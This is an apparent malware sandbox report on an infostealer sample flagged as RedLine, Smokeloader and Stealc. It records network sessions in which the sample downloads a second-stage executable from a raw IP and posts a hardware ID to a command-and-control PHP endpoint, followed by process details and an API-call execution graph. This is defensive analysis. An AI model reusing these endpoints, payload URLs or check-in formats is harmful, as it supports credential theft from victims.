                                                                                  Oct 26, 2024 18:58:20.320590019 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320600033 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320637941 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320657969 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320669889 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320693970 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320702076 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320705891 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320710897 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320717096 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320730925 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320746899 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320760012 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320848942 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320888042 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320892096 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320899010 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320920944 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320928097 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320936918 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320940971 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320964098 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320981979 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.321069002 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.321080923 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.321094036 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.321118116 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.321139097 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.321352005 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.321398020 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.321400881 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.321413040 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.321425915 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.321432114 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.321505070 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:25.204703093 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:25.206496954 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:25.387622118 CEST4973280192.168.2.462.204.41.177
                                                                                  Oct 26, 2024 18:58:25.393187046 CEST804973262.204.41.177192.168.2.4
                                                                                  Oct 26, 2024 18:58:25.393249035 CEST4973280192.168.2.462.204.41.177
                                                                                  Oct 26, 2024 18:58:25.393450975 CEST4973280192.168.2.462.204.41.177
                                                                                  Oct 26, 2024 18:58:25.399065018 CEST804973262.204.41.177192.168.2.4
                                                                                  Oct 26, 2024 18:58:26.274070024 CEST804973262.204.41.177192.168.2.4
                                                                                  Oct 26, 2024 18:58:26.274171114 CEST4973280192.168.2.462.204.41.177
                                                                                  Oct 26, 2024 18:58:26.668085098 CEST4973280192.168.2.462.204.41.177
                                                                                  Oct 26, 2024 18:58:26.673666954 CEST804973262.204.41.177192.168.2.4
                                                                                  Oct 26, 2024 18:58:28.019727945 CEST804973262.204.41.177192.168.2.4
                                                                                  Oct 26, 2024 18:58:28.019793034 CEST4973280192.168.2.462.204.41.177
                                                                                  Oct 26, 2024 18:58:33.266067982 CEST804973262.204.41.177192.168.2.4
                                                                                  Oct 26, 2024 18:58:33.266150951 CEST4973280192.168.2.462.204.41.177
                                                                                  Oct 26, 2024 18:58:48.474795103 CEST4973280192.168.2.462.204.41.177
                                                                                  Oct 26, 2024 19:00:06.751259089 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 19:00:07.060772896 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 19:00:07.670155048 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 19:00:08.873297930 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 19:00:11.279546976 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 19:00:16.092078924 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 19:00:25.701447964 CEST4973180192.168.2.4176.113.115.37

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 26, 2024 18:58:16.762857914 CEST6267053192.168.2.41.1.1.1
                                                                                  Oct 26, 2024 18:58:16.960917950 CEST53626701.1.1.1192.168.2.4
                                                                                  Oct 26, 2024 18:58:33.396524906 CEST53547041.1.1.1192.168.2.4

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Oct 26, 2024 18:58:16.762857914 CEST192.168.2.41.1.1.10x45aaStandard query (0)post-to-me.comA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Oct 26, 2024 18:58:16.960917950 CEST1.1.1.1192.168.2.40x45aaNo error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                                                  Oct 26, 2024 18:58:16.960917950 CEST1.1.1.1192.168.2.40x45aaNo error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • post-to-me.com
                                                                                  • 176.113.115.37
                                                                                  • 62.204.41.177

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.449731176.113.115.37807288C:\Users\user\Desktop\jicQJ2cdlM.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 26, 2024 18:58:18.723166943 CEST85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                                                  User-Agent: ShareScreen
                                                                                  Host: 176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.631794930 CEST1236INHTTP/1.1 200 OK
                                                                                  Date: Sat, 26 Oct 2024 16:58:19 GMT
                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                  Last-Modified: Sat, 26 Oct 2024 16:45:02 GMT
                                                                                  ETag: "62400-62563f4f86bc9"
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 402432
                                                                                  Content-Type: application/x-msdos-program
                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 93 81 e6 bb d7 e0 88 e8 d7 e0 88 e8 d7 e0 88 e8 6a af 1e e8 d6 e0 88 e8 c9 b2 0c e8 ca e0 88 e8 c9 b2 1d e8 c3 e0 88 e8 c9 b2 0b e8 ba e0 88 e8 f0 26 f3 e8 d2 e0 88 e8 d7 e0 89 e8 ac e0 88 e8 c9 b2 02 e8 d6 e0 88 e8 c9 b2 1c e8 d6 e0 88 e8 c9 b2 19 e8 d6 e0 88 e8 52 69 63 68 d7 e0 88 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fe b8 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a4 03 00 00 d8 72 02 00 00 00 00 1e 17 00 00 00 10 00 00 00 c0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 76 02 00 04 00 00 15 54 [TRUNCATED]
                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$j&RichPEL>er@pvT<`tp.textL `.rdata%&@@.dataxp@.weriritDt8@.rsrcp`t@@
                                                                                  Oct 26, 2024 18:58:19.631834984 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 0d 04 f0 43 00 75 02 f3 c3 e9 19 07 00 00 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 e8 90 08 00 00 8b
                                                                                  Data Ascii: ;CuUQeVEPuuu9Et4t+M^UEVFuc?FHlHhN;CtCHpuF;CtFCHpuNFF@puHpF@
                                                                                  Oct 26, 2024 18:58:19.631851912 CEST1236INData Raw: 40 50 ff 75 fc e8 44 2d 00 00 59 59 85 c0 74 31 c1 fb 02 50 8d 34 98 e8 17 0f 00 00 59 a3 48 04 b4 02 ff 75 08 e8 09 0f 00 00 89 06 83 c6 04 56 e8 fe 0e 00 00 59 a3 44 04 b4 02 8b 45 08 59 eb 02 33 c0 5f 5e 5b c9 c3 8b ff 56 6a 04 6a 20 e8 ae 2c
                                                                                  Data Ascii: @PuD-YYt1P4YHuVYDEY3_^[Vjj ,VHDujX^&3^jh0Cg""%euYEEE"%UuYH]U=pDu)ua'h$YY
                                                                                  Oct 26, 2024 18:58:19.631863117 CEST1236INData Raw: df 75 4c 39 3d 98 0e 44 00 74 33 56 e8 56 25 00 00 59 85 c0 0f 85 72 ff ff ff 8b 45 10 3b c7 0f 84 50 ff ff ff c7 00 0c 00 00 00 e9 45 ff ff ff 33 ff 8b 75 0c 6a 04 e8 0a 12 00 00 59 c3 3b df 75 0d 8b 45 10 3b c7 74 06 c7 00 0c 00 00 00 8b c3 e8
                                                                                  Data Ascii: uL9=Dt3VV%YrE;PE3ujY;uE;t-t"ttHt3VWh3FWPC13~~~~CF+@Ou@Nu_^U
                                                                                  Oct 26, 2024 18:58:19.631882906 CEST1236INData Raw: c6 08 83 7d e0 04 89 75 e4 72 e9 8b c7 89 7b 04 c7 43 08 01 00 00 00 e8 67 fb ff ff 6a 06 89 43 0c 8d 43 10 8d 89 b4 f5 43 00 5a 66 8b 31 41 66 89 30 41 40 40 4a 75 f3 8b f3 e8 d7 fb ff ff e9 b7 fe ff ff 80 4c 03 1d 04 40 3b c1 76 f6 46 46 80 7e
                                                                                  Data Ascii: }ur{CgjCCCZf1Af0A@@JuL@;vFF~4C@IuCCSs3{95DXM_^3[jhCM}_huuE;CWh '"Y
                                                                                  Oct 26, 2024 18:58:19.631894112 CEST1236INData Raw: 5f 5d c3 85 ff 74 37 85 c0 74 33 56 8b 30 3b f7 74 28 57 89 38 e8 c1 fe ff ff 59 85 f6 74 1b 56 e8 45 ff ff ff 83 3e 00 59 75 0f 81 fe b0 f6 43 00 74 07 56 e8 59 fd ff ff 59 8b c7 5e c3 33 c0 c3 6a 0c 68 d8 d8 43 00 e8 23 14 00 00 e8 2c 03 00 00
                                                                                  Data Ascii: _]t7t3V0;t(W8YtVE>YuCtVYY^3jhC#,CFpt"~ltpluj MY6jYeFl=CiEEjYuUV5C5Ct!CtP5Ct'
                                                                                  Oct 26, 2024 18:58:19.631905079 CEST1236INData Raw: c0 43 00 85 c0 75 07 56 e8 b3 11 00 00 59 8b f8 85 ff 0f 84 5e 01 00 00 8b 35 84 c0 43 00 68 e4 c2 43 00 57 ff d6 68 d8 c2 43 00 57 a3 dc 09 44 00 ff d6 68 cc c2 43 00 57 a3 e0 09 44 00 ff d6 68 c4 c2 43 00 57 a3 e4 09 44 00 ff d6 83 3d dc 09 44
                                                                                  Data Ascii: CuVY^5ChCWhCWDhCWDhCWD=D5CDt=Dt=Dtu$CDCD$@5DDCC5DP5D5DD5DD5
                                                                                  Oct 26, 2024 18:58:19.631911993 CEST1236INData Raw: 5e 5d c3 8b ff 55 8b ec 8b 0d 5c 04 b4 02 a1 60 04 b4 02 6b c9 14 03 c8 eb 11 8b 55 08 2b 50 0c 81 fa 00 00 10 00 72 09 83 c0 14 3b c1 72 eb 33 c0 5d c3 8b ff 55 8b ec 83 ec 10 8b 4d 08 8b 41 10 56 8b 75 0c 57 8b fe 2b 79 0c 83 c6 fc c1 ef 0f 8b
                                                                                  Data Ascii: ^]U\`kU+Pr;r3]UMAVuW+yiDMIMS1UVUU]utJ?vj?ZK;KuB sL!\Du#M!JL!uM!Y]S[MMZU
                                                                                  Oct 26, 2024 18:58:19.631923914 CEST1236INData Raw: c4 00 00 00 8a 46 43 8a c8 fe c1 84 c0 8b 45 08 88 4e 43 75 03 09 78 04 ba 00 00 00 80 8b cb d3 ea f7 d2 21 50 08 8b c3 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 0c 8b 4d 08 8b 41 10 53 56 8b 75 10 57 8b 7d 0c 8b d7 2b 51 0c 83 c6 17 c1 ea 0f 8b ca 69
                                                                                  Data Ascii: FCENCux!P_^[UMASVuW}+QiDMOI;|9M]UE;;MIM?vj?YM_;_uC sML!\Du&M!ML!uM!YO
                                                                                  Oct 26, 2024 18:58:19.631936073 CEST1236INData Raw: 21 0b eb 2c 8d 4f e0 d3 eb 8b 4d fc 8d 8c 88 c4 00 00 00 8d 7c 38 04 f7 d3 21 19 fe 0f 89 5d ec 75 0b 8b 5d 08 8b 4d ec 21 4b 04 eb 03 8b 5d 08 83 7d f8 00 8b 4a 08 8b 7a 04 89 79 04 8b 4a 04 8b 7a 08 89 79 08 0f 84 8d 00 00 00 8b 4d f4 8d 0c f1
                                                                                  Data Ascii: !,OM|8!]u]M!K]}JzyJzyMyJzQJQJ;Ju^LM L}#}u;M|D)}uN{MN7MtLMuNL2uy
                                                                                  Oct 26, 2024 18:58:19.637486935 CEST1236INData Raw: 1d 78 0b 44 00 0f 84 c5 00 00 00 89 1d 74 0b 44 00 8a 45 10 a2 70 0b 44 00 83 7d 0c 00 0f 85 9d 00 00 00 ff 35 48 04 b4 02 e8 e0 e8 ff ff 59 8b f8 89 7d d8 85 ff 74 78 ff 35 44 04 b4 02 e8 cb e8 ff ff 59 8b f0 89 75 dc 89 7d e4 89 75 e0 83 ee 04
                                                                                  Data Ascii: xDtDEpD}5HY}tx5DYu}uu;rW9t;rJ65H5D~9}u9Et}}Eu}hCC_YhCCOYE}u(xDjYu


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.44973262.204.41.177807404C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 26, 2024 18:58:25.393450975 CEST88OUTGET / HTTP/1.1
                                                                                  Host: 62.204.41.177
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  Oct 26, 2024 18:58:26.274070024 CEST203INHTTP/1.1 200 OK
                                                                                  Date: Sat, 26 Oct 2024 16:58:26 GMT
                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                  Content-Length: 0
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Oct 26, 2024 18:58:26.668085098 CEST419OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----KJEHJKJEBGHJJKEBGIEC
                                                                                  Host: 62.204.41.177
                                                                                  Content-Length: 219
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 38 35 45 46 46 41 42 36 38 30 38 33 36 37 34 34 38 30 34 36 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 2d 2d 0d 0a
                                                                                  Data Ascii: ------KJEHJKJEBGHJJKEBGIECContent-Disposition: form-data; name="hwid"985EFFAB68083674480464------KJEHJKJEBGHJJKEBGIECContent-Disposition: form-data; name="build"default9_cap------KJEHJKJEBGHJJKEBGIEC--
                                                                                  Oct 26, 2024 18:58:28.019727945 CEST210INHTTP/1.1 200 OK
                                                                                  Date: Sat, 26 Oct 2024 16:58:26 GMT
                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                  Content-Length: 8
                                                                                  Keep-Alive: timeout=5, max=99
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                  Data Ascii: YmxvY2s=


                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.449730104.21.56.704437288C:\Users\user\Desktop\jicQJ2cdlM.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-26 16:58:17 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                                                  User-Agent: ShareScreen
                                                                                  Host: post-to-me.com
                                                                                  2024-10-26 16:58:18 UTC781INHTTP/1.1 200 OK
                                                                                  Date: Sat, 26 Oct 2024 16:58:18 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lu7vCWjykJrsdM9EQ%2BeRT4wDcuj%2Fb2VcOQlbJimhTV4kUSV1WIgKtDU6bMjmLg%2Bfo2T%2F%2F4zvWCkZp8K5kqeZPOAS0khiqeGMHHogsjJg8%2Bq2tSCApYfTVbgmtUOhDEyMkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8d8bfd84e9714632-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1244&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=728&delivery_rate=2625566&cwnd=242&unsent_bytes=0&cid=68090397425893b3&ts=506&x=0"
                                                                                  2024-10-26 16:58:18 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                  Data Ascii: 2ok
                                                                                  2024-10-26 16:58:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:12:58:12
                                                                                  Start date:26/10/2024
                                                                                  Path:C:\Users\user\Desktop\jicQJ2cdlM.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\jicQJ2cdlM.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:480'256 bytes
                                                                                  MD5 hash:C26C0C92EF5AD707C6F9DD37B2C016AE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4174565055.00000000007F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:1
                                                                                  Start time:12:58:20
                                                                                  Start date:26/10/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:402'432 bytes
                                                                                  MD5 hash:085DE763171FBBAFEAC2CDB972AACC2A
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2054517436.0000000002E39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.1833028905.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2054499794.0000000002E09000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 34%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:12:58:27
                                                                                  Start date:26/10/2024
                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7404 -s 1132
                                                                                  Imagebase:0x930000
                                                                                  File size:483'680 bytes
                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:2.2%
                                                                                    Dynamic/Decrypted Code Coverage:3.8%
                                                                                    Signature Coverage:5.8%
                                                                                    Total number of Nodes:738
                                                                                    Total number of Limit Nodes:21
                                                                                    execution_graph 64040 9e003c 64041 9e0049 64040->64041 64055 9e0e0f SetErrorMode SetErrorMode 64041->64055 64046 9e0265 64047 9e02ce VirtualProtect 64046->64047 64049 9e030b 64047->64049 64048 9e0439 VirtualFree 64053 9e05f4 LoadLibraryA 64048->64053 64054 9e04be 64048->64054 64049->64048 64050 9e04e3 LoadLibraryA 64050->64054 64052 9e08c7 64053->64052 64054->64050 64054->64053 64056 9e0223 64055->64056 64057 9e0d90 64056->64057 64058 9e0dad 64057->64058 64059 9e0dbb GetPEB 64058->64059 64060 9e0238 VirtualAlloc 64058->64060 64059->64060 64060->64046 64061 7f98cc 64062 7f98ce 64061->64062 64065 7f9aae 64062->64065 64066 7f9abd 64065->64066 64069 7fa24e 64066->64069 64070 7fa269 64069->64070 64071 7fa272 CreateToolhelp32Snapshot 64070->64071 64072 7fa28e Module32First 64070->64072 64071->64070 64071->64072 64073 7fa29d 64072->64073 64074 7f9aad 64072->64074 64076 7f9f0d 64073->64076 64077 7f9f38 64076->64077 64078 7f9f49 VirtualAlloc 64077->64078 64079 7f9f81 64077->64079 64078->64079 64079->64079 64080 404bb3 64081 404bbf Mailbox 64080->64081 64086 40fb31 64081->64086 64085 404bdf Mailbox std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 64089 40fb36 64086->64089 64088 404bc8 64094 4051f5 64088->64094 64089->64088 64091 40fb52 Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 64089->64091 64110 42ad9e 64089->64110 64117 42f470 7 API calls 2 library calls 64089->64117 64118 42862d RaiseException 64091->64118 64093 4103ec 64095 405201 Mailbox __Cnd_init 64094->64095 64098 405219 __Mtx_init 64095->64098 64129 40ce57 28 API calls std::_Throw_Cpp_error 64095->64129 64097 405240 64121 4010ea 64097->64121 64098->64097 64130 40ce57 28 API calls std::_Throw_Cpp_error 64098->64130 64104 40528f 64105 4052a4 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 64104->64105 64132 401128 28 API calls 2 library calls 64104->64132 64133 401109 64105->64133 64109 4052c9 Mailbox 64109->64085 64115 4336c7 __Thrd_start 64110->64115 64111 433705 64120 42eae9 20 API calls __dosmaperr 64111->64120 64113 4336f0 RtlAllocateHeap 64114 433703 64113->64114 64113->64115 64114->64089 64115->64111 64115->64113 64119 42f470 7 API calls 2 library calls 64115->64119 64117->64089 64118->64093 64119->64115 64120->64114 64137 40d338 64121->64137 64125 401103 64126 40cf18 64125->64126 64169 42e134 64126->64169 64129->64098 64130->64097 64131 40ce57 28 API calls std::_Throw_Cpp_error 64131->64104 64132->64104 64134 401115 __Mtx_unlock 64133->64134 64135 401122 64134->64135 64501 40ce57 28 API calls std::_Throw_Cpp_error 64134->64501 64135->64109 64141 40d092 64137->64141 64140 40ce57 28 API calls std::_Throw_Cpp_error 64140->64125 64142 40d0e8 64141->64142 64143 40d0ba GetCurrentThreadId 64141->64143 64144 40d112 64142->64144 64145 40d0ec GetCurrentThreadId 64142->64145 64146 40d0c5 GetCurrentThreadId 64143->64146 64156 40d0e0 64143->64156 64147 40d1ab GetCurrentThreadId 64144->64147 64151 40d132 64144->64151 64148 40d0fb 64145->64148 64146->64156 64147->64148 64149 40d202 GetCurrentThreadId 64148->64149 64148->64156 64149->64156 64166 40e954 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 64151->64166 64154 4010f6 64154->64125 64154->64140 64155 40d16a GetCurrentThreadId 64155->64148 64157 40d13d __Xtime_diff_to_millis2 64155->64157 64159 40f8f4 64156->64159 64157->64148 64157->64155 64157->64156 64167 40e954 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 64157->64167 64160 40f8fd 64159->64160 64161 40f8ff IsProcessorFeaturePresent 64159->64161 64160->64154 64163 40f972 64161->64163 64168 40f936 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64163->64168 64165 40fa55 64165->64154 64166->64157 64167->64157 64168->64165 64170 42e141 64169->64170 64171 42e155 64169->64171 64192 42eae9 20 API calls __dosmaperr 64170->64192 64183 42e0eb 64171->64183 64175 42e146 64193 42a5bd 26 API calls _Deallocate 64175->64193 64177 42e16a CreateThread 64179 42e195 64177->64179 64180 42e189 GetLastError 64177->64180 64221 42dfe0 64177->64221 64178 40527c 64178->64104 64178->64131 64195 42e05d 64179->64195 64194 42eab3 20 API calls __dosmaperr 64180->64194 64203 434d4a 64183->64203 64187 42e104 64188 42e123 64187->64188 64189 42e10b GetModuleHandleExW 64187->64189 64190 42e05d __Thrd_start 22 API calls 64188->64190 64189->64188 64191 42e12d 64190->64191 64191->64177 64191->64179 64192->64175 64193->64178 64194->64179 64196 42e06a 64195->64196 64202 42e08e 64195->64202 64197 42e070 CloseHandle 64196->64197 64198 42e079 64196->64198 64197->64198 64199 42e088 64198->64199 64200 42e07f FreeLibrary 64198->64200 64201 43348a _free 20 API calls 64199->64201 64200->64199 64201->64202 64202->64178 64204 434d57 64203->64204 64205 434d97 64204->64205 64206 434d82 HeapAlloc 64204->64206 64210 434d6b __Thrd_start 64204->64210 64219 42eae9 20 API calls __dosmaperr 64205->64219 64207 434d95 64206->64207 64206->64210 64209 42e0fb 64207->64209 64212 43348a 64209->64212 64210->64205 64210->64206 64218 42f470 7 API calls 2 library calls 64210->64218 64213 4334be __dosmaperr 64212->64213 64214 433495 HeapFree 64212->64214 64213->64187 64214->64213 64215 4334aa 